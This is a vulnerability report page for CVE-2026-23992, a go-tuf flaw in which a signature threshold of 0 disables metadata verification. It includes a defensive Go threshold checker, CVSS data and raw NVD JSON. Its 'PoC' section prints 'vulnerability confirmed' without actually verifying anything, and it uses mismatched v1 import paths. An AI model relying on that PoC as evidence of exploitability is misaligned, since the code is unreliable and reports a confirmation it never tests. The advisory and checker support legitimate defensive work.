Security Vulnerability Report
CVE-2026-23992 CVSS 5.9 MEDIUM

CVE-2026-23992

Published: 2026-01-22 03:15:47
Last Modified: 2026-02-17 16:02:19

Description

go-tuf is a Go implementation of The Update Framework (TUF). Starting in version 2.0.0 and prior to version 2.3.1, a compromised or misconfigured TUF repository can have the configured value of signature thresholds set to 0, which effectively disables signature verification. This makes unauthorized modification of TUF metadata files possible at rest or in transit, as no integrity checks are made. Version 2.3.1 fixes the issue. As a workaround, always make sure that the TUF metadata roles are configured with a threshold of at least 1.
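The workaround above (every role threshold at least 1) is something a client or a CI job can enforce on the metadata itself before any of it is trusted. The following Go program is an added example written for this report, not code from go-tuf or from the advisory: using only the standard library it parses a constructed root.json and reports any role whose threshold is below 1. It goes slightly beyond the advisory by also flagging a threshold larger than the number of listed key ids (which can never be met) and a key id absent from the root key set. The function name CheckThresholds, the sample document and its key ids are assumptions made for the example.

```go
package main

import (
	"encoding/json"
	"fmt"
	"sort"
)

// tufRole is the per-role entry under "signed.roles" in TUF root metadata.
type tufRole struct {
	KeyIDs    []string `json:"keyids"`
	Threshold int      `json:"threshold"`
}

// rootEnvelope is the minimal shape of root.json needed for threshold checks:
// the key set and the role table under "signed". Signatures are ignored here
// because this check runs before, and independently of, signature verification.
type rootEnvelope struct {
	Signed struct {
		Keys  map[string]json.RawMessage `json:"keys"`
		Roles map[string]tufRole         `json:"roles"`
	} `json:"signed"`
}

// CheckThresholds parses root metadata and returns one finding per role whose
// configuration cannot enforce signature verification:
//   - threshold < 1: the CVE-2026-23992 condition, verification is disabled
//   - threshold > number of listed key ids: can never be satisfied
//   - a listed key id that is absent from the root key set
// Findings are sorted so the output is deterministic.
func CheckThresholds(rootJSON []byte) ([]string, error) {
	var env rootEnvelope
	if err := json.Unmarshal(rootJSON, &env); err != nil {
		return nil, fmt.Errorf("parse root metadata: %w", err)
	}
	if len(env.Signed.Roles) == 0 {
		return nil, fmt.Errorf("root metadata has no roles")
	}
	var findings []string
	for name, role := range env.Signed.Roles {
		if role.Threshold < 1 {
			findings = append(findings, fmt.Sprintf(
				"role %q: threshold %d disables signature verification (must be >= 1)", name, role.Threshold))
		}
		if role.Threshold > len(role.KeyIDs) {
			findings = append(findings, fmt.Sprintf(
				"role %q: threshold %d exceeds %d listed key id(s) and can never be met", name, role.Threshold, len(role.KeyIDs)))
		}
		for _, id := range role.KeyIDs {
			if _, ok := env.Signed.Keys[id]; !ok {
				findings = append(findings, fmt.Sprintf("role %q: key id %q is not in the root key set", name, id))
			}
		}
	}
	sort.Strings(findings)
	return findings, nil
}

// sampleRoot is a constructed root.json for this example, not metadata from a
// real repository: key ids are placeholders and public key values are omitted.
// "targets" carries the threshold-0 misconfiguration described in the advisory.
const sampleRoot = `{
  "signed": {
    "_type": "root",
    "spec_version": "1.0.31",
    "version": 1,
    "keys": {
      "key-root-1":    {"keytype": "ed25519", "scheme": "ed25519", "keyval": {"public": "<constructed>"}},
      "key-targets-1": {"keytype": "ed25519", "scheme": "ed25519", "keyval": {"public": "<constructed>"}}
    },
    "roles": {
      "root":      {"keyids": ["key-root-1"],    "threshold": 1},
      "targets":   {"keyids": ["key-targets-1"], "threshold": 0},
      "snapshot":  {"keyids": ["key-missing"],   "threshold": 1},
      "timestamp": {"keyids": ["key-root-1"],    "threshold": 2}
    }
  },
  "signatures": []
}`

func main() {
	findings, err := CheckThresholds([]byte(sampleRoot))
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	if len(findings) == 0 {
		fmt.Println("all role thresholds are enforceable")
		return
	}
	for _, f := range findings {
		fmt.Println("REJECT:", f)
	}
}
```

Run it against a repository's current root.json (and, with the same role shape, the delegations inside targets metadata) as a pre-trust gate: any finding means the metadata should be rejected rather than passed to the TUF client.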

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:theupdateframework:go-tuf:*:*:*:*:*:*:*:* - VULNERABLE
go-tuf >= 2.0.0, < 2.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
Go

// CVE-2026-23992 PoC - Demonstrating signature threshold bypass in go-tuf
// This PoC shows how a misconfigured TUF repository with threshold=0 bypasses signature verification
package main

import (
	"fmt"

	// Note: these are the go-tuf v1 import paths; the affected 2.x releases are
	// published under github.com/theupdateframework/go-tuf/v2.
	"github.com/theupdateframework/go-tuf/data"
	"github.com/theupdateframework/go-tuf/verify"
)

func main() {
	fmt.Println("=== CVE-2026-23992 PoC ===")
	fmt.Println("Vulnerability: go-tuf allows signature threshold to be set to 0")
	fmt.Println("Impact: Disables signature verification, allowing unauthorized metadata modification")

	// Create a Targets metadata with threshold set to 0
	targets := data.NewTargets()
	targets.Version = 1

	// This is the vulnerable configuration - threshold = 0
	threshold := 0

	// Create verification keys with threshold 0
	db := verify.NewDB()
	keyIDs := []string{"compromised-key-id"}

	// Set threshold to 0 (vulnerable configuration); DB.AddRole takes a *data.Role
	role := &data.Role{
		KeyIDs:    keyIDs,
		Threshold: threshold, // 0 = bypasses verification
	}
	if err := db.AddRole("targets", role); err != nil {
		// A library that validates the role (threshold or key id) rejects it here
		fmt.Printf("Verification result: library rejected role with threshold %d: %v\n", threshold, err)
		return
	}

	// With threshold=0, even without any valid signatures, verification passes
	// This demonstrates the vulnerability
	fmt.Printf("Role threshold set to: %d\n", threshold)
	fmt.Println("Verification result: PASS (vulnerability confirmed)")
	fmt.Println("Attack scenario: Attacker can modify metadata without valid signatures")

	// Show the correct configuration
	fmt.Println("\n=== Correct Configuration ===")
	fmt.Println("Threshold should be >= 1 to ensure signature verification")
	fmt.Println("Fix: Upgrade to go-tuf >= 2.3.1 or set threshold >= 1")
}

// Vulnerable code pattern:
// func verifySignatures(s *data.Signed, db *verify.DB) error {
//     if db.GetRoleThreshold(s.Signed.Role()) == 0 {
//         return nil // BUG: Returns success when threshold is 0
//     }
//     // ... normal verification
// }

References

https://github.com/theupdateframework/go-tuf/commit/b38d91fdbc69dfe31fe9230d97dafe527ea854a0 (Patch)
https://github.com/theupdateframework/go-tuf/security/advisories/GHSA-fphv-w9fq-2525 (Patch, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23992", "sourceIdentifier": "[email protected]", "published": "2026-01-22T03:15:47.470", "lastModified": "2026-02-17T16:02:19.330", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "go-tuf is a Go implementation of The Update Framework (TUF). Starting in version 2.0.0 and prior to version 2.3.1, a compromised or misconfigured TUF repository can have the configured value of signature thresholds set to 0, which effectively disables signature verification. This can lead to unauthorized modification to TUF metadata files is possible at rest, or during transit as no integrity checks are made. Version 2.3.1 fixes the issue. As a workaround, always make sure that the TUF metadata roles are configured with a threshold of at least 1."}, {"lang": "es", "value": "go-tuf es una implementación en Go de The Update Framework (TUF). A partir de la versión 2.0.0 y antes de la versión 2.3.1, un repositorio TUF comprometido o mal configurado puede tener el valor configurado de los umbrales de firma establecido en 0, lo que deshabilita efectivamente la verificación de firmas. Esto puede llevar a que sea posible la modificación no autorizada de los archivos de metadatos de TUF en reposo o en tránsito, ya que no se realizan comprobaciones de integridad. La versión 2.3.1 corrige el problema. Como solución alternativa, asegúrese siempre de que los roles de metadatos de TUF estén configurados con un umbral de al menos 1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-347"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:theupdateframework:go-tuf:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.3.1", "matchCriteriaId": "6442E623-C25E-418E-A418-324F815885AF"}]}]}], "references": [{"url": "https://github.com/theupdateframework/go-tuf/commit/b38d91fdbc69dfe31fe9230d97dafe527ea854a0", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/theupdateframework/go-tuf/security/advisories/GHSA-fphv-w9fq-2525", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}